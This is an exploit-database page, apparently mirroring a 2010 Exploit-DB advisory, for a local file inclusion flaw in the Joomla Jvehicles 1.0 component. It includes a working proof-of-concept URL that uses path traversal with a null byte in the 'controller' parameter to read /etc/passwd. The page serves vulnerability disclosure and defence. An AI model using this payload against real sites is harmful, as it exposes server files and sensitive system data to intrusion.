header-logo
Suggest Exploit
vendor:
Jvehicles
by:
Chip D3 Bi0s
N/A
CVSS
N/A
Local File Inclusion
CWE
Product Name: Jvehicles
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

Joomla Component Jvehicles Local File Inclusion

This vulnerability allows an attacker to include local files on the server by exploiting an error in the 'jvehicles.php' file of the Jvehicles component in Joomla. By manipulating the 'controller' parameter in the URL, an attacker can traverse the file system and access sensitive files, such as the '/etc/passwd' file.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Jvehicles component or to remove the vulnerable component from the Joomla installation.
Source

Exploit-DB raw data:

---------------------------------------------------------------------------------
Joomla Component Jvehicles Local File Inclusion
---------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Group		: LatinHackTeam
Email & msn	: chipdebios@gmail.com
Date		: 31 March 2010
Critical Lvl	: Moderate
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application	: Jvehicles
version		: 1.0
Developer	: este8an
License		: GPL            type  : Non-Commercial
Date Added	: 5 May 2009
Download	: http://www.jvehicles.com/index.php?option=com_remository&Itemid=6&func=select&id=2&orderby=3〈=en




Description     :

Derivation of a popular component com_properties (for Estate Agent) .
This component is to manage vehicles. With the same functionality.


--------------
file error	: components/com_jvehicles/jvehicles.php

how to exploit

http://127.0.0.1/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00

------------------------


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Navigation

Suggest Exploit

Services By CQR